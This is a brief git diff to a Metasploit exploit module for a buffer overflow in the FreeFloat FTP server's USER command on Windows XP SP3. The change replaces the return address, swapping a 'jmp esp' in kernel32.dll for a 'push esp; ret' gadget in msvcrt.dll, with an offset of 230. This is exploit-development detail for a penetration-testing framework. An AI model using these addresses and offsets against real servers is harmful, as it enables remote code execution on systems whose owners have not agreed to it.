diff --git a/modules/exploits/windows/ftp/freefloatftp_user.rb b/modules/exploits/windows/ftp/freefloatftp_user.rb index 32c2708e4b..aa172070d0 100644 --- a/modules/exploits/windows/ftp/freefloatftp_user.rb +++ b/modules/exploits/windows/ftp/freefloatftp_user.rb @@ -47,7 +47,7 @@ class Metasploit4 < Msf::Exploit::Remote [ [ 'Windows XP SP3', { - 'Ret' => 0x7c83c2c5, # jmp esp kernel32.dll + 'Ret' => 0x77c35459 , # push esp; ret - mscvrt.dll 'Offset' => 230 } ], @@ -75,5 +75,4 @@ class Metasploit4 < Msf::Exploit::Remote send_user(buf) disconnect end - end